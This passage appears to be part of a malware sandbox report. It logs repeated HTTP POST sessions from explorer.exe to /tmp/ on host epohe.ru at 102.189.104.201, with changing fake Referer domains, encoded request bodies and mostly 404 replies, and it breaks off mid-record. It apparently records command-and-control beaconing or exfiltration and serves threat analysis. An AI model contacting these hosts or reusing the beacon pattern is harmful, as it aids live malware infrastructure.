Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:41.565570116 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dyovtuslfwnpfvr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 288 Host: epohe.ru
Sep 2, 2024 11:42:41.565582991 CEST	288	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 40 1c c8 bc Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu@qNMwHmTQ4D@DlnQNQ7SA9isPGk"N.FR{rA3A"thqFchAt 872
Sep 2, 2024 11:42:42.462212086 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:42.470792055 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://agwwkiqfcegkjh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: epohe.ru
Sep 2, 2024 11:42:42.470805883 CEST	188	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5f 51 c0 93 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu_QptyvHgr?jwU>=]IG^~#xujMRBR,+
Sep 2, 2024 11:42:43.396027088 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:43.405877113 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ivdbemhblrd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: epohe.ru
Sep 2, 2024 11:42:43.405930042 CEST	201	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 62 5f e3 fa Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vub_kKVTznkt109g0#! &+F4KYQuh-FV)*}\HW
Sep 2, 2024 11:42:44.306678057 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:44.324088097 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qsasppprtpxcq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: epohe.ru
Sep 2, 2024 11:42:44.324112892 CEST	185	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 23 52 bc f7 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu#RRSue{[\|-Xx38ZzzoiL3u9Ihg6/zs(%I
Sep 2, 2024 11:42:45.219665051 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:45.227931023 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iwrtbbnydhaevbhj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: epohe.ru
Sep 2, 2024 11:42:45.227952957 CEST	130	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2c 53 c5 e4 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu,SdTjT~hdd\q~RF@l3
Sep 2, 2024 11:42:46.144552946 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:46.152132988 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://scammxgavejetg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: epohe.ru
Sep 2, 2024 11:42:46.152154922 CEST	353	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 38 3a aa a6 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu8:vc8FX)Vmf"l5@Ks[8_ =\|{\|T=1XZY1{8E$v\|{hB:Mpb4I
Sep 2, 2024 11:42:47.094243050 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:47.102015972 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jjpobfosorxh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: epohe.ru
Sep 2, 2024 11:42:47.102040052 CEST	214	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 21 3f e6 8b Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu!?T^RwUPxk(}.^WU5j53T '?f}z:K3L~ghL_(+
Sep 2, 2024 11:42:48.002998114 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:48.010832071 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tfebikfnyin.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: epohe.ru
Sep 2, 2024 11:42:48.010863066 CEST	338	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 46 0c ab bd Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuFQ^{gjc(\>jIj5ctRKBnWYOz{B!c{"WGG\%k[<KT2KH71L:3
Sep 2, 2024 11:42:48.936934948 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:48.945523024 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkxpvxaevqgmdlaa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 142 Host: epohe.ru
Sep 2, 2024 11:42:48.945555925 CEST	142	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 71 33 d1 ac Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuq3{Q}\|ICw,4"l^$3>FA
Sep 2, 2024 11:42:49.851730108 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:49.862679005 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fprowwsvixkulpo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: epohe.ru
Sep 2, 2024 11:42:49.862703085 CEST	334	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 4c 31 d7 f3 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuL1z[Co ee>iHoz%V,QU@+1X!5GNY}DE/S!B57X'Jc]1WNE;/Wt
Sep 2, 2024 11:42:50.783155918 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 